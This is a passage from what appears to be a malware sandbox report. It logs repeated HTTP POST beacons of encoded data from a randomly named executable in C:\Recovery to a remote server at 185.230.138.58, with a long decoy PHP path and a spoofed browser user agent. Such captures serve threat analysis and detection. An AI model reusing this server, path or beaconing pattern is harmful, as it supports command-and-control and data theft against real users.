                                                                                                                                        Data Ascii: RTZ__ETT[YQVYYX[VZ]XZX[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",, #_2*[*>*S X"_)<<Y%=?93R08$7*$'^& X/$
                                                                                                                                        Dec 21, 2024 10:09:42.252207041 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:42.484774113 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:42 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        106192.168.2.450077185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:42.732103109 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:43.080349922 CET1012OUTData Raw: 57 55 5f 50 5f 46 54 53 5b 59 51 56 59 5c 58 59 56 58 5d 59 5a 5a 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_P_FTS[YQVY\XYVX]YZZ[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";!<'%,>*>9#>>_*,(X2+"(9(0>3'93'^& X/0
                                                                                                                                        Dec 21, 2024 10:09:43.979111910 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:44.212886095 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:43 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        107192.168.2.450081185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:44.460604906 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:44.811449051 CET1012OUTData Raw: 57 55 5a 5a 5f 44 51 56 5b 59 51 56 59 52 58 5c 56 52 5d 5c 5a 5d 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WUZZ_DQV[YQVYRX\VR]\Z][H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/8#+&Z*[*>&S4X:)(X2X(_4$'3$"0'^& X/
                                                                                                                                        Dec 21, 2024 10:09:45.709216118 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        108192.168.2.450086185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:45.745301008 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:46.092755079 CET1892OUTData Raw: 57 57 5f 5a 5f 49 51 5e 5b 59 51 56 59 5b 58 5e 56 5e 5d 5f 5a 5e 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WW_Z_IQ^[YQVY[X^V^]_Z^[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",2!,+_2*>=:U"==><$Y%85<0$-<Y3'50:'^& X/,
                                                                                                                                        Dec 21, 2024 10:09:46.992075920 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:47.228858948 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:46 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 1e 35 25 23 52 26 03 37 56 24 58 32 5c 28 10 0d 5a 27 3c 3d 45 34 55 23 01 3d 3f 30 02 24 2d 36 15 24 3f 33 0b 2b 0e 2b 58 2d 20 20 46 04 1c 20 01 3f 23 03 0e 3d 01 33 01 38 06 29 5e 2b 1c 29 02 22 2f 31 5b 34 2d 36 5f 23 08 35 18 3c 17 08 1a 29 1a 30 5b 39 3d 2e 5d 21 3a 23 56 0b 1f 3a 0b 3d 09 3a 5b 30 0e 20 15 27 34 22 55 23 08 2f 51 35 0b 3b 50 21 5b 27 12 27 3b 26 11 36 5e 24 10 29 11 22 59 25 29 27 0d 2e 17 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%5%#R&7V$X2\(Z'<=E4U#=?0$-6$?3++X- F ?#=38)^+)"/1[4-6_#5<)0[9=.]!:#V:=:[0 '4"U#/Q5;P!['';&6^$)"Y%)'.&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        109192.168.2.450087185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:45.872637987 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:46.220393896 CET1012OUTData Raw: 57 57 5a 5f 5a 43 51 53 5b 59 51 56 59 5c 58 5c 56 5f 5d 5f 5a 5d 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WWZ_ZCQS[YQVY\X\V_]_Z][C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!;87;Y&/!(=*7:\>,?16<*4&.$=''^& X/0
                                                                                                                                        Dec 21, 2024 10:09:47.118750095 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:47.353364944 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:46 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        110192.168.2.450093185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:47.602221966 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:47.952095032 CET1012OUTData Raw: 57 54 5f 58 5f 47 51 5f 5b 59 51 56 59 58 58 5b 56 5a 5d 5e 5a 5f 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WT_X_GQ_[YQVYXX[VZ]^Z_[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!, ^#;[&?=*-)4X=)?(2("(?'8X$Q)'*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:48.850156069 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:49.088948011 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:48 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        111192.168.2.450097185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:49.333390951 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:49.686533928 CET1012OUTData Raw: 57 52 5f 5e 5a 47 51 51 5b 59 51 56 59 5c 58 5e 56 5c 5d 5c 5a 5b 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WR_^ZGQQ[YQVY\X^V\]\Z[[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/T<Y Z $/)(>2V#="]>4189+*/U'-<]'453'^& X/0
                                                                                                                                        Dec 21, 2024 10:09:50.577585936 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:50.817471981 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:50 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        112192.168.2.450101185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:51.146717072 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:51.502568007 CET1012OUTData Raw: 57 50 5f 5e 5a 40 51 5f 5b 59 51 56 59 52 58 58 56 5a 5d 5d 5a 5c 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WP_^Z@Q_[YQVYRXXVZ]]Z\[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!," <%?=)[.V#-&[)<]'8)(*+'=<\$-&*'^& X/


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        113192.168.2.450106185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:52.355792046 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:52.702250004 CET1892OUTData Raw: 57 50 5a 5f 5a 43 51 56 5b 59 51 56 59 5e 58 5a 56 52 5d 58 5a 5a 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WPZ_ZCQV[YQVY^XZVR]XZZ[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/,\4<?2.[)>24X%=<4\2=(:,' \'4>\0:'^& X/8
                                                                                                                                        Dec 21, 2024 10:09:53.603060961 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:53.833009005 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:53 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 59 36 1b 23 56 25 04 37 1f 33 10 3a 5a 3f 00 3b 5f 30 02 31 40 23 1d 38 5f 3d 01 24 05 27 2d 2a 1b 26 3f 2c 53 3c 56 20 01 39 0a 20 46 04 1c 23 59 3d 33 25 0a 3e 2b 38 1b 2c 06 08 02 3c 31 36 17 35 02 31 58 21 3e 0c 17 20 31 08 0b 28 39 2e 52 29 0a 38 5e 2d 58 26 5d 22 2a 23 56 0b 1f 3a 0d 3e 20 08 10 27 09 16 59 26 51 26 1d 37 1f 37 56 23 22 02 0d 22 04 20 04 26 28 08 5a 22 5e 23 0c 28 2f 2e 5a 32 5f 38 50 2e 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%Y6#V%73:Z?;_01@#8_=$'-*&?,S<V 9 F#Y=3%>+8,<1651X!> 1(9.R)8^-X&]"*#V:> 'Y&Q&77V#"" &(Z"^#(/.Z2_8P.-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        114192.168.2.450107185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:52.481507063 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:52.827301979 CET1012OUTData Raw: 57 52 5a 5f 5a 47 54 55 5b 59 51 56 59 5f 58 5b 56 5e 5d 57 5a 58 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WRZ_ZGTU[YQVY_X[V^]WZX[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8;7Z$26^>- .);1&<?V'>&$*&*'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:53.738043070 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:53.977231026 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:53 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        115192.168.2.450112185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:54.226638079 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:54.577543974 CET1012OUTData Raw: 52 57 5f 5b 5f 40 51 52 5b 59 51 56 59 53 58 5c 56 5c 5d 59 5a 51 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RW_[_@QR[YQVYSX\V\]YZQ[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/;#;%:X*=2R >/?2+!<9('8]36$*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:55.471494913 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:55.705043077 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:55 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        116192.168.2.450117185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:55.946949005 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:56.295944929 CET1012OUTData Raw: 57 5f 5f 50 5f 49 54 56 5b 59 51 56 59 5c 58 5a 56 52 5d 58 5a 5a 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W__P_ITV[YQVY\XZVR]XZZ[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"810\!,<1:Z>67.") ]%)Y+7'=$Y$)3*'^& X/0
                                                                                                                                        Dec 21, 2024 10:09:57.193470001 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:57.425106049 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:57 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        117192.168.2.450121185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
